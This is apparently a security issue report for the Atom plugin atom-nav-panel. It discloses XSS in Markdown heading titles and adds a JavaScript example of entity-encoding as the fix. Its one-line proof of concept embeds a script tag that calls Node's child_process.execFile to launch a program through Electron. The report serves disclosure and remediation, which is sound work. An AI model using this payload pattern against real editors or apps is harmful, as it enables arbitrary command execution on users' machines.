forked from Ziink/atom-nav-panel
Description
The current implementation allows for XSS in the title fields.
XSS in Electron allows interaction with the system API and execution of applications or commands.
Markdown POC:
# sometitle <script type="text/javascript">window.top.require('child_process').execFile('/usr/bin/gnome-calculator',function(){});</script>
Fix:
Encode output before it is presented to the UI.
OWASP XSS Prevention Cheat Sheet
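The fix the report asks for, as an added example that is not part of the issue or of atom-nav-panel's code: heading titles pulled out of a Markdown document are entity-encoded before they are interpolated into the panel's HTML, so a `<script>` element in the document text arrives in the panel as inert text. The function names (`parseHeading`, `escapeHtml`, `renderNavItemUnsafe`, `renderNavItemSafe`, `buildNavPanel`) and the sample document are assumptions made for this example; the unsafe renderer is kept only to contrast it with the encoded one.

```javascript
// Added example (not atom-nav-panel's own code): encode Markdown heading titles
// before they become markup in an Electron/Atom view.

// Entity map for the HTML body context (OWASP XSS Prevention Cheat Sheet rule #1).
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Replace every HTML-significant character with its entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Parse an ATX heading ("## Title") into its level and raw title text.
// Returns null for lines that are not headings. (Assumed helper.)
function parseHeading(line) {
  const m = /^(#{1,6})\s+(.*?)\s*#*\s*$/.exec(line);
  if (!m) return null;
  return { level: m[1].length, title: m[2] };
}

// UNSAFE: the pattern the issue describes, raw title text dropped into HTML.
function renderNavItemUnsafe(heading) {
  return `<li class="nav-item level-${heading.level}">${heading.title}</li>`;
}

// SAFE: the title is entity-encoded first, so markup in the document text
// renders as literal characters instead of being parsed as elements.
// In a real Atom view, assigning `element.textContent = heading.title`
// instead of building an innerHTML string achieves the same result.
function renderNavItemSafe(heading) {
  return `<li class="nav-item level-${heading.level}">${escapeHtml(heading.title)}</li>`;
}

// Build the whole panel from a Markdown document, defaulting to the safe renderer.
function buildNavPanel(markdown, render = renderNavItemSafe) {
  const items = [];
  for (const line of markdown.split('\n')) {
    const h = parseHeading(line);
    if (h) items.push(render(h));
  }
  return `<ul class="nav-panel">${items.join('')}</ul>`;
}

// Constructed sample document; the script body is a placeholder comment, not a payload.
const SAMPLE_MARKDOWN = [
  '# Introduction',
  'Some text.',
  '## Setup <script>/* constructed placeholder */</script>',
  '### Tom & Jerry\'s "notes"',
].join('\n');

// Simple check used to compare the two renderers: is there still a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe:', buildNavPanel(SAMPLE_MARKDOWN, renderNavItemUnsafe));
console.log('safe:  ', buildNavPanel(SAMPLE_MARKDOWN));
```

Running the block prints both panels; only the unsafe one still contains a parseable `<script>` element. The escaping covers the HTML body context only; a title that is later placed inside an attribute or a URL needs the context-specific encoding the cheat sheet describes.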